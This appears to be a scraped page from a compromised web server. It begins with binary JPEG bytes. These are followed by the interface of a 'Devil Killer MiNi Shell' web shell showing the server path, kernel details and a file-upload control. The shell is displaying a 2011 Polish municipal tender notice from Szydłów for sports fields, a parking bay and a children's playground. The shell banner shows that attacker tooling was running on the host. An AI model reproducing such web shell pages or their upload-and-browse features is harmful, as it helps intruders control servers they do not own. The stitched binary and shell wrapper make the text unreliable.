JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/127606-N-2011.html

<p class="kh_header"><b>Szydłów: Budowa zespołu boisk sportowych w Korytnicy i zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci w Brzezinach</b><br>
<b>Numer ogłoszenia: 127606 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szydłów , ul. Rynek 2, 28-225 Szydłów, woj. świętokrzyskie, tel. 041 3545125, faks 041 3545125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szydlow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zespołu boisk sportowych w Korytnicy i zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci w Brzezinach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - Budowa zespołu boisk w Korytnicy
1)	Wykonanie boiska do piłki nożnej - 22, 0 x 40, 0m wraz z oznakowaniem,
-	nawierzchnia trawiasta, 
-	bramki - 2szt, 
-	ławki betonowe z siedziskiem drewnianym - 24 szt,
2)	Wykonanie boiska do piłki siatkowej i koszykówki - 19, 10 x 32, 10m wraz z oznakowaniem,
-	nawierzchnia asfaltowa (28, 10 x 15, 10m) z obrzeżem z kostki betonowej szer. 2, 0m, 
-	ławki betonowe z siedziskiem drewnianym - 16 szt,
-	sprzęt do siatkówki i koszykówki,
3)	Rozbiórka istniejącego ogrodzenia oraz budowę ogrodzenia: 
-	z profilowanych paneli zgrzewanych, stalowych, prefabrykowanych, na cokołach z żelbetowych elementów prefabrykowanych, wys. 2,0 m (wraz z cokołem) - około 165, 0 m,
-	brama szer. 4,0m - 1 szt,
-	furtki szer. 1,0m - 2 szt,
Uwaga: 
a)	od strony zachodniej pozostaje istniejące ogrodzenie,
b)	brama i furtki i ogrodzenie - z jednego systemu paneli,
c)	panele z ocynkowanych drutów stalowych malowanych wraz ze słupkami na kolor jasny,

4)	Rozbiórkę budynków gospodarczych, z pokryciem z płyt azbestowo - cementowych wraz z utylizacją płyt (budynek 6, 0 x 8,3m i 7,3 x 10,0m) oraz wywozem gruzu w miejsce wskazane przez zamawiającego na odległość do 7 km,
5)	Likwidację istniejącej studni,
6)	Uporządkowanie terenu bezpośrednio przyległego do terenu budowy w zasięgu robót budowlanych.

Kod CPV
a)	4511 1000-8 Roboty w zakresie burzenia, roboty ziemne,
b)	4522 2000-9 Roboty budowlane w zakresie robót inżynieryjnych, z wyjątkiem mostów, tuneli, szybów i kolei podziemnej,
c)	4534 2000-6 Wznoszenie ogrodzeń,
d)	4523 6000-0 Wyrównywanie terenu,

zakres robót na w/w zadaniu realizowany w 2011 r. - do kwoty 140 000, 00 PLN, pozostałe roboty w 2012 r.

Zadanie nr 2 - Budowa zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci

1)	Plac zabaw dla dzieci wraz z wyposażeniem,

Dostawa i montaż wyposażenia placu zabaw:
a)	Zabawka jednoosobowa na sprężynie - typu kiwak lub bujak, imitacja zwierząt z jednym siedziskiem - 1 kpl,
b)	Zabawka jednoosobowa na sprężynie - typu kiwak lub bujak, imitacja samolotu z jednym siedziskiem - 1 kpl,
c)	Zabawka dwuosobowa na sprężynie - typu ważka imitacja zwierząt - 1 kpl,
d)	Zabawka dwuosobowa - typu ważka zwykła- imitacja zwierząt - 1 kpl,
e)	Huśtawka podwójna wahadłowa z drabinkami - 1 kpl,
f)	Karuzela czteroosobowa krzyżowa - 1 kpl,
g)	Wieża z balkonikiem - 1 kpl,
h)	Regulamin placu zabaw, stale zakotwiczony w gruncie - 1 kpl,
i)	   Metalowy kosz na śmieci - 2 szt,
j)	   Ławki parkowe betonowo - drewniane - 2 szt,
k)	Transport elementów opisanych w punktach 1 - 10 na miejsce, montaż u zamawiającego.

2)	Zatoka postojowa dla samochodów,
Zakres opracowania obejmuje:
a)	wykonanie robot ziemnych,
b)	wykonanie robót brukarskich,
c)	wykonanie warstwy odcinającej z piasku,
d)	wykonanie podbudowy,
e)	wykonanie warstwy wiążącej z BA KR I-II,
f)	wykonanie warstwy ścieralnej z BA KR I-II,
g)	Uporządkowanie terenu bezpośrednio przyległego do terenu budowy w zasięgu robót budowlanych.

Nawierzchnie drogowe
Kategoria obciążenia ruchem - przyjęto, jako KRI.

Rozwiązanie projektowe:
jezdnia:
-	warstwa odcinająca z piasku zwykłego o gr. 15cm,
-	podbudowa kruszywo łamane 0/63mm o gr. 20cm,
-	warstwa wiążąca z BA KR1-2 0/12,8mm o gr. 4cm,
-	warstwa ścieralna z BA KR1-2 0/12,8mm o gr. 4cm
 chodniki:
-	warstwa kruszywa łamanego 0/31,5mm stabilizowanego mechanicznie o grubości 10cm,
-	warstwa podsypki cementowo-piaskowej z piasku łamanego grubości 5cm po zagęszczeniu,
-	warstwa ścieralna z kostki brukowej betonowej kolorowej 6cm,

Kod CPV
a)	4511 1000-8	- Roboty w zakresie burzenia, roboty ziemne,
b)	4511 2000-5	- Roboty w zakresie usuwania gleby,
c)	45233000-9	- Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg,
d)	4511 2723-9	- Roboty w zakresie kształtowania placów zabaw

Uwaga: Wykonawca, którego oferta zostanie wybrana do realizacji przez zawarciem umowy przedłoży zamawiającemu kosztorys ofertowy z układem tabeli elementów scalonych określonym przez zamawiającego w załączniku 6..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zmówienia podstawowego, zgodnie z zapisami art. 67 ust.1 pkt.6 Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.22.20.00-9, 45.34.20.00-6, 45.23.60.00-0, 45.11.10.00-8, 45.11.20.00-5, 45.23.30.00-9, 45.11.27.23-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Oferta powinna być zabezpieczona wadium w wysokości:
a)	Dla zadania nr 1 - Budowa zespołu boisk w Korytnicy
5 000, 00 PLN (słownie: pięć tysięcy PLN), 
b)	Dla zadania nr 2 - Budowa zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci
1 500, 00 PLN (słownie: jeden tysiąc pięćset PLN), 

wniesionym do zamawiającego przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
Nr rachunku: 68 8521 0006 2001 0000 0130 0007
2)	Wadium może być wnoszone w jednej lub kilku formach, określonych w art. 45 ust. 6 ustawy Pzp,
3)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu Gminy w Szydłowie, prowadzony w Banku Spółdzielczym z adnotacją: Wadium do przetargu nieograniczonego na: Budowę zespołu boisk sportowych w Korytnicy i/lub zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci w Brzezinach. 
Do oferty należy dołączyć kopię polecenia przelewu poświadczoną za zgodność z oryginałem przez wykonawcę składającego ofertę. Wadium wnoszone w pozostałych formach należy dołączyć w oryginale do oferty.
4)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa, w art.26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5)	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach, określonych w ofercie,
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla zad I Budowa zespołu boisk w Korytnicy:
-	posiadają doświadczenie zawodowe, obejmujące zrealizowanie z należytą starannością w ostatnich 5 latach przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. jednego zamówienia, odpowiadającego swoim rodzajem i wartością niniejszemu zamówieniu -o wartości jednego zadania inwestycyjnego - min. 100 000,00 PLN, polegającego na realizacji boisk z nawierzchnią trawiastą lub utwardzoną,

dla zad II Budowa zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci 
-	posiadają doświadczenie zawodowe, obejmujące zrealizowanie z należytą starannością w ostatnich 5 latach przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. jednego zamówienia, odpowiadającego swoim rodzajem i wartością niniejszemu zamówieniu -o wartości jednego zadania inwestycyjnego - min. 50 000,00 PLN, polegającego na realizacji parkingu z nawierzchnią utwardzoną lub/i placu zabaw dla dzieci,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalności ogólnobudowlanej oraz przynależącymi do właściwej izby samorządu zawodowego,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty wg załącznika 1 SIWZ,
2)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy wg załącznika 2 SIWZ,
3)	Oświadczenia oraz dokumenty w celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust.1 ustawy,
a)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontroli, jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami, wg wzoru stanowiącego załącznik Nr 3 SIWZ,
b)	wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone wg załącznika 4 SIWZ,
c)	oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - oświadczenie wg wzoru stanowiącego załącznik Nr 5 SIWZ,
4)	Oświadczenia oraz dokumenty w celu wykazania braku podstaw do wykluczenia wykonawcy 
z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art.24 ust.1 ustawy:
a)	oświadczenie o braku podstaw do wykluczenia wg załącznika 6 SIWZ,
b)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt 2 ustawy,
osoby fizyczne - oświadczenie o braku podstaw do wykluczenia w zakresie art. 24 ust 1 pkt 2,
c)	wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej zamiast wymienionego dokumentu składa dokumenty zgodne z §4 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
5)	Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, składa wraz z ofertą pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - ewentualnie do wykorzystania oświadczenie - załącznik 7 SIWZ,
6)	Jeżeli podmioty, o których mowa w ppkt 4, będą brały udział w realizacji części zamówienia wykonawca złoży wraz ofertą, dokumenty wymienione w ppkt 3, dotyczące tych podmiotów,
7)	Pełnomocnictwo, określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik,
8)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia,
9)	Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące warunki zmiany terminu zakończenia przedmiotu umowy:
a)	w przypadku przerwy w wykonywaniu robót budowlanych spowodowanej niekorzystnymi warunkami atmosferycznymi oraz działaniem siły wyższej uniemożliwiającymi prowadzenie robót zgodnie ze specyfikacją techniczną wykonania i odbioru robót, przez okres min. 10 dni. Fakt ten musi być potwierdzony w dzienniku budowy,
b)	w przypadku zaistnienia okoliczności, o których stanowi art. 67 ust. 1 pkt. 5 i 6, ustawy Pzp w następstwie, których mogłaby zostać zawarta umowa na wykonanie robót dodatkowych lub uzupełniających,
c)	w przypadku realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
d)	w przypadku zajścia okoliczności (zdarzeń), na które strony nie miały wpływu, a dotyczyły działania lub zaniechania osób trzecich lub organów administracji, w stosunku do okoliczności towarzyszących zawarciu umowy i czyniących niemożliwym spełnienie świadczeń stron umowy, w sposób określony pierwotnie w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szydlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Szydłów, ul. Rynek 2, 28-225 Szydłów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 10:00, miejsce: Urząd Gminy Szydłów, ul. Rynek 2, 28-225 Szydłów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Budowa zespołu boisk w Korytnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Wykonanie boiska do piłki nożnej - 22, 0 x 40, 0m wraz z oznakowaniem,
-	nawierzchnia trawiasta, 
-	bramki - 2szt, 
-	ławki betonowe z siedziskiem drewnianym - 24 szt,
2)	Wykonanie boiska do piłki siatkowej i koszykówki - 19, 10 x 32, 10m wraz z oznakowaniem,
-	nawierzchnia asfaltowa (28, 10 x 15, 10m) z obrzeżem z kostki betonowej szer. 2, 0m, 
-	ławki betonowe z siedziskiem drewnianym - 16 szt,
-	sprzęt do siatkówki i koszykówki,
3)	Rozbiórka istniejącego ogrodzenia oraz budowę ogrodzenia: 
-	z profilowanych paneli zgrzewanych, stalowych, prefabrykowanych, na cokołach z żelbetowych elementów prefabrykowanych, wys. 2,0 m (wraz z cokołem) - około 165, 0 m,
-	brama szer. 4,0m - 1 szt,
-	furtki szer. 1,0m - 2 szt,
Uwaga: 
a)	od strony zachodniej pozostaje istniejące ogrodzenie,
b)	brama i furtki i ogrodzenie - z jednego systemu paneli,
c)	panele z ocynkowanych drutów stalowych malowanych wraz ze słupkami na kolor jasny,

4)	Rozbiórkę budynków gospodarczych, z pokryciem z płyt azbestowo - cementowych wraz z utylizacją płyt (budynek 6, 0 x 8,3m i 7,3 x 10,0m) oraz wywozem gruzu w miejsce wskazane przez zamawiającego na odległość do 7 km,
5)	Likwidację istniejącej studni,
6)	Uporządkowanie terenu bezpośrednio przyległego do terenu budowy w zasięgu robót budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.22.20.00-9, 45.34.20.00-6, 45.23.60.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Budowa zatoki postojowej dla 10 samochodów wraz z placem zabaw dla dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Plac zabaw dla dzieci wraz z wyposażeniem,

Dostawa i montaż wyposażenia placu zabaw:
a)	Zabawka jednoosobowa na sprężynie - typu kiwak lub bujak, imitacja zwierząt z jednym siedziskiem - 1 kpl,
